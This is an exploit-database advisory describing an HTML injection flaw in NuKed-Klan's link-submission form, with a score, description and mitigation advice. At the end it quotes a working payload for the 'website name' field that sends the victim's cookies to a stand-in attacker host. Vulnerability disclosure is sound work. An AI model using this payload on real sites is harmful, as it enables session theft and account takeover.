header-logo
Suggest Exploit
vendor:
NuKed-Klan
by:
Unknown
7.5
CVSS
HIGH
HTML Injection
79
CWE
Product Name: NuKed-Klan
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE: Unknown
CPE: a:nukedklan:nukedklan
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

HTML Injection in NuKed-Klan ‘submit URI link’ function

The 'submit URI link' function in NuKed-Klan is prone to a HTML injection vulnerability. This is due to a lack of input validation on the 'website name' input field of the form. Attackers can exploit this vulnerability to manipulate web content or steal cookie-based authentication credentials. They can also perform arbitrary actions as the victim user.

Mitigation:

Implement proper input validation and sanitization to prevent HTML injection attacks. Also, ensure that cookie-based authentication credentials are properly protected.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/11733/info

NuKed-Klan 'submit URI link' function is reported prone to a HTML injection vulnerability. It is reported that the issue exists due to a lack of sufficient input validation performed on the 'website name' input field of the NuKed-Klan submit URI link form.

Attackers may potentially exploit this issue to manipulate web content or to steal cookie-based authentication credentials. It may also be possible to take arbitrary actions as the victim user.

http://www.example.com/index.php?file=Suggest&module=Links
[Name of website] [a lot of spaces]
\'/>\"/><script></script><script>document.location=\'http://www.hacker.com/cookie.php?cookie=\'
+window.document.cookie;</script>